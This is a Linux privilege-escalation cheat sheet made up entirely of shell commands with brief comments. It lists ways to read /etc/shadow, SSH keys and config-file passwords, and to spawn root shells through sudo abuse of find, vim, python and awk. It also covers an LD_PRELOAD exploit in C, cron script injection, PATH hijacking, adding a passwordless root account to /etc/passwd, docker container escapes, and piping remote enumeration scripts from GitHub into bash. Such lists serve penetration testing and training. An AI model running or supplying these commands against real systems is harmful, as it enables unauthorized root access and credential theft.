# OS & kernel
uname -a
cat /etc/os-release
cat /proc/version
# Current user
id
whoami
sudo -l # What can we run as sudo?
# Users on system
cat /etc/passwd
cat /etc/shadow # Needs root
cat /etc/group
# Logged-in users
who
w
last
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
# Both
find / -perm /6000 -type f 2>/dev/null
# Check GTFOBins for abuse: https://gtfobins.github.io/
# List sudo rights
sudo -l
# Common abusable sudo entries (check GTFOBins)
sudo find . -exec /bin/bash \;
sudo vim -c '!bash'
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo awk 'BEGIN {system("/bin/bash")}'
sudo less /etc/passwd # then: !/bin/bash
sudo man man # then: !/bin/bash
# env_keep and LD_PRELOAD
# If sudo -l shows: env_keep+=LD_PRELOAD
cat > /tmp/priv.c << EOF
#include <stdio.h>
#include <stdlib.h>
void _init() { setuid(0); system("/bin/bash"); }
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/priv.so /tmp/priv.c
sudo LD_PRELOAD=/tmp/priv.so find
# List cron jobs
cat /etc/crontab
ls /etc/cron.d/
ls /etc/cron.daily/
crontab -l
cat /var/spool/cron/crontabs/root 2>/dev/null
# Check for writable scripts run by root cron
# If a cron job runs a writable script:
echo 'chmod +s /bin/bash' >> /path/to/script.sh
# Wait for cron, then:
bash -p
# World-writable files
find / -writable -type f 2>/dev/null | grep -v proc
# Writable directories
find / -writable -type d 2>/dev/null
# PATH hijacking
# If a SUID binary calls a command without full path:
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
./vulnerable_suid_binary
# Writable /etc/passwd
# Add root user: new:x:0:0:root:/root:/bin/bash
echo 'hacked::0:0:root:/root:/bin/bash' >> /etc/passwd
su hacked
# Find binaries with capabilities
getcap -r / 2>/dev/null
# Common exploitable capabilities
# cap_setuid+ep on python3:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# cap_net_raw+ep → sniff traffic
# cap_dac_read_search+ep → read any file
# Get kernel version
uname -r
# Search for exploits
searchsploit linux kernel 4.4
# OR use: https://github.com/mzet-/linux-exploit-suggester
# Download and run suggester
curl -s https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash
# Config files with passwords
grep -r "password" /etc/ 2>/dev/null
grep -r "passwd" /var/www/ 2>/dev/null
grep -rn "DB_PASS\|db_password\|SECRET" /var/www/ 2>/dev/null
# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "*.pem" 2>/dev/null
cat ~/.bash_history
# Web server configs
cat /etc/apache2/sites-enabled/*.conf
cat /etc/nginx/sites-enabled/*
# Check if in container
cat /proc/1/cgroup | grep docker
ls /.dockerenv
# If in docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# Privileged container escape
mount /dev/sda1 /mnt
chroot /mnt
# LinPEAS (most comprehensive)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash
# LinEnum
./LinEnum.sh -s -k password -r report -e /tmp/ -t
# Linux Smart Enumeration
./lse.sh -l 1 # level 1 (default)
./lse.sh -l 2 # level 2 (more verbose)